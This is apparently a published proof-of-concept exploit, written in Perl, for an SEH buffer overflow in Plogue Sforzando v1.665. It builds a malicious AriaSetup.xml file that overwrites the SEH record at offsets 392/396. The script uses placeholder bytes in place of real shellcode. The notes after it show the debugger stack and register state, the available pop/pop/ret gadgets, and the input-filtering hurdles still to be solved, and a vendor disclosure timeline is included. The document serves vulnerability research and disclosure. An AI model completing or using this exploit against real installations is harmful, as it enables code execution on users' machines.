#!/usr/bin/perl
##########################################################################################
# Exploit Title: Plogue Sforzando v1.665 Buffer Overflow POC
# Date Discovered: 10-29-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: Sforzando v1.665
# Software Link: http://www.softpedia.com/dyn-postdownload.php?p=227357&t=0&i=1
# Vendor site: http://www.plogue.com/downloads/
# Version: 1.665
# Tested On: Windows XP SP3
##########################################################################################
# Timeline
# - 10-29: Vuln discovered, vendor contacted
# - 10-30: Vendor acknowleged receipt of bug report
# - 10-31: Vendor applied fix to software installers
##########################################################################################
# At first glance this seems to be a straightforward SEH BOF however it's not the case
# largely due to the way the application treats non-ASCII input (see notes after POC code)
# Refer to the notes at the end of POC code for more details
##########################################################################################
# The application loads the AriaSetup.xml file at launch and reads the product value
# By changing these values we can generate a BOF as follows
my $buffsize = 15000; # sets buffer size for consistent sized payload
# build the start of the xml file
my $header = '<?xml version="1.0" ?><Key>key</Key><AriaSetup version="1665">';
$header = $header . '<Property name="vendor" value="Plogue Art et Technologie, Inc"/>';
$header = $header . '<Property name="product" value="';
my $junk = "\x41" x 392; # 392 is the offset of next seh followed by 4920 bytes of controllable data
my $nseh = "\x42\x42\x42\x42"; # overwrite next seh
my $seh = "\x43\x43\x43\x43"; # overwrite seh (and EIP, offset 396)
my $shell = "\x45" x 5000; # placeholder for shell code; also accessible via ESP+2500 (length 4916)
my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble exploit portion of buffer
my $fill = "\x46" x ($buffsize - (length($header)+length($sploit))); # fill remainder of buffer
my $buffer = $header.$sploit.$fill; # construct the final buffer
# write the exploit buffer to file
my $file = "AriaSetup.xml";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($buffer) . "\n";
#############################################
#------------------- NOTES------------------#
#############################################
# after the above POC, seh chain looks like this:
# Address SE handler
# 0012E31C ntdll.7C9032BC
# 0012ECC4 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the stack...
# ...
# 0012ECB0 41414141 AAAA
# 0012ECB4 41414141 AAAA
# 0012ECB8 41414141 AAAA
# 0012ECBC 41414141 AAAA
# 0012ECC0 41414141 AAAA
# 0012ECC4 42424242 BBBB Pointer to next SEH record
# 0012ECC8 43434343 CCCC SE handler
# 0012ECCC 44444444 DDDD
# 0012ECD0 44444444 DDDD
# 0012ECD4 44444444 DDDD
# 0012ECE0 44444444 DDDD
# 0012ECE4 44444444 DDDD
# ...
# And the registers...
# EAX 00000000
# ECX 43434343
# EDX 7C9032BC ntdll.7C9032BC
# EBX 00000000
# ESP 0012E308
# EBP 0012E328
# ESI 00000000
# EDI 00000000
# EIP 43434343
# So, next SEH is overwritten at offset 392, SEH (and EIP) at 396
# and there is plenty of room directly following for shellcode
# The problem that we have for an SEH BOF are the available pop/pop/ret and the input sanitization performed by the application
# Here are the 14 available pop/pop/ret found by mona (using -all switch)
# 0x72d11f39 : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1170b : pop esi pop ebx ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1204e : pop esi pop ebx ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d115b8 : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1263d : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1269c : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x00280b0b : call dword ptr ss:[ebp+30] | startnull,ascii {PAGE_READONLY}
# 0x72d119de : pop esi pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d11225 : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d1283f : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12899 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d128f3 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12956 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12ebe : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# 0x72d12f35 : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
# The application only accepts certain characters as input, limited primarily to the ASCII character set, with some exceptions:
#
# All ASCII characters \x0a through \x7f appear to be accepted as-is except as follows:
# - \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x26 -- these are stripped entirely
# - \x22 appears to be processed as a double quote and terminates the remainder of the xml string input
# - \x0a is replaced with \x0d
# Anything outside of the ASCII range appears to be stripped (or sometimes replaced)
# This poses a problem when trying to find a usable address for our overwrites
# For example, given the pop/pop/ret addresses found, we would need to include \xd1
# If we try to overwrite SEH with the the address 0x72d11225 (\x25\x12\xd1\x72) we get this:
# 0012ECBC 41414141 AAAA
# 0012ECC0 41414141 AAAA
# 0012ECC4 42424242 BBBB Pointer to next SEH record
# 0012ECC8 44721225 %%%D SE handler
# 0012ECCC 44444444 DDDD
# 0012ECD0 44444444 DDDD
# Notice how \xd1 is stripped (and our trailing input shifted).
# Through a bit of basic trial and error I noticed that you can
# force the application to retain input chars by appending other chars to it.
# For example to maintain \xd1 we can append \xa9 to it
# An SEH overwrite of \x25\x12\xd1\xa9\x72 would result in:
# 0012ECBC 41414141 AAAA
# 0012ECC0 41414141 AAAA
# 0012ECC4 42424242 BBBB Pointer to next SEH record
# 0012ECC8 A9D11225 %%%% SE handler
# 0012ECCC 44444472 rDDD
# 0012ECD0 44444444 DDDD
# This time \xd1 is maintained but unfortunately, the app also maintains the appended \xa9 byte
# which makes this approach innefective for addressing (but possibly useful for shellcode)
# I didn't have the time to investigate this any further but I figured I'd post this POC
# in case someone else wants to give it a go